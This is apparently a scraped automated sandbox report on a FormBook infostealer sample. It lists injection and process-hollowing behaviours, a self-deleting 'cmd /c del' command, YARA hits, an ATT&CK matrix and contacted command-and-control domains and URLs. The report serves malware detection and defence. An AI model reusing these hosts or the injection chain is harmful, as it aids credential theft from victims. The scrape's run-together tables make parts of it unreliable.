          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 4084Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 4084Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3272Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1F0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: FC0008Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000003.2284166438.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1462391746.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: explorer.exe, 00000010.00000002.2660398665.00000000012D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Progman-
          Source: explorer.exe, 00000004.00000000.1462669782.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000010.00000002.2670266703.0000000004FE0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004FE0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanER\S-1-5c
          Source: explorer.exe, 00000004.00000003.2284166438.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2364455621.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: GetLocaleInfoW,CmAtolW,GetNumberFormatW,lstrlenW,CmIsDigitW,5_2_001F61CA
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Users\user\Desktop\VFylJFPzqX.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_001F73D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_001F73D5
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Shared Modules          		1
          Valid Accounts          		1
          Valid Accounts          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Valid Accounts          		LSASS Memory341
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
          Process Injection          		1
          Access Token Manipulation          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		NTDS151
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          DLL Side-Loading          		151
          Virtualization/Sandbox Evasion          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts712
          Process Injection          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Deobfuscate/Decode Files or Information          		DCSync223
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Hidden Files and Directories          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Abuse Elevation Control Mechanism          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron4
          Obfuscated Files or Information          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
          Software Packing          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
          DLL Side-Loading          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524408 Sample: VFylJFPzqX.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 37 www.mlharquitectura.com 2->37 39 www.history-poker.site 2->39 41 7 other IPs or domains 2->41 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 9 other signatures 2->51 11 VFylJFPzqX.exe 4 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\VFylJFPzqX.exe.log, ASCII 11->33 dropped 35 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->35 dropped 63 Writes to foreign memory regions 11->63 65 Allocates memory in foreign processes 11->65 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->67 69 Injects a PE file into a foreign processes 11->69 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Sample uses process hollowing technique 15->75 77 4 other signatures 15->77 18 explorer.exe 29 1 15->18 injected process9 dnsIp10 43 td-ccm-neg-87-45.wixdns.net 34.149.87.45, 49714, 80 ATGS-MMD-ASUS United States 18->43 21 cmmon32.exe 18->21         started        24 WerFault.exe 21 18->24         started        process11 signatures12 53 Modifies the context of a thread in another process (thread injection) 21->53 55 Maps a DLL or memory area into another process 21->55 57 Tries to detect virtualization through RDTSC time measurements 21->57 59 Switches to a custom stack to bypass stack traces 21->59 26 explorer.exe 26 145 21->26         started        29 cmd.exe 1 21->29         started        process13 signatures14 61 Query firmware table information (likely to detect VMs) 26->61 31 conhost.exe 29->31         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          VFylJFPzqX.exe74%ReversingLabsByteCode-MSIL.Backdoor.FormBook
          VFylJFPzqX.exe100%AviraHEUR/AGEN.1309628
          VFylJFPzqX.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://outlook.com0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          brasilbikeshopsc.com
          		191.252.4.20
          		truetrue
            		unknown
            td-ccm-neg-87-45.wixdns.net
            		34.149.87.45
            		truetrue
              		unknown
              www.mlharquitectura.com
              		unknown
              		unknowntrue
                		unknown
                www.creatievecontentpeople.com
                		unknown
                		unknowntrue
                  		unknown
                  www.history-poker.site
                  		unknown
                  		unknowntrue
                    		unknown
                    www.cargizmos.net
                    		unknown
                    		unknowntrue
                      		unknown
                      api.msn.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.brasilbikeshopsc.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.mlharquitectura.com/igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2true
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://powerpoint.office.comerexplorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.mckinleyint.com/igbn/www.livewey.netexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.123-tecnicos.com/igbn/www.s5agents.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.bangunrumahkreasi.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.prolongdogslife.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://android.notify.windows.com/iOSA4explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.s5agents.com/igbn/www.getrightspt.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.webinarcerdaskanindonesia.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.nftcopyrights.xyzReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.itk.world/igbn/www.betmonde396.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.creatingsobriety.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.creatingsobriety.com/igbn/www.rusticramble.onlineexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.itk.world/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000010.00000002.2678982121.0000000009FA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.freakyressop.xyzReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://excel.office.comexplorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.00000000093CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.gbraises.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.rumblerain.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.bangunrumahkreasi.com/igbn/www.freakyressop.xyzexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.livewey.net/igbn/www.freakyressop.xyzexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.noticeupluy.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.azure1224.xyzexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.brasilbikeshopsc.comReferer:explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://api.msn.com/RV9cuexplorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.brasilbikeshopsc.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.mckinleyint.com/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.gbraises.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.prolongdogslife.com/igbn/www.enet-insaat.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.cargizmos.net/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.microsoft.cexplorer.exe, 00000004.00000003.2284166438.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.bangunrumahkreasi.comexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.s5agents.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.fliptrade.cfd/igbn/explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://android.notify.windows.com/iOSdexplorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.history-poker.siteexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.monicadenis.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
